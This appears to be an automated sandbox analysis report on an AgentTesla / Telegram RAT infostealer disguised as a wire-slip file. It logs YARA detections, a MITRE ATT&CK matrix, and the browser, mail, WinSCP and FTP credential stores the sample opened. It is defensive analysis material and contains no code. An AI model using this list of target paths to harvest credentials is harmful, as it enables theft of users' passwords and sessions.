Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Users\user\Desktop\Wire slip account payable.pif.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Users\user\AppData\Roaming\EQVRGq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Users\user\AppData\Roaming\EQVRGq.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\EQVRGq.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	631 Security Software Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
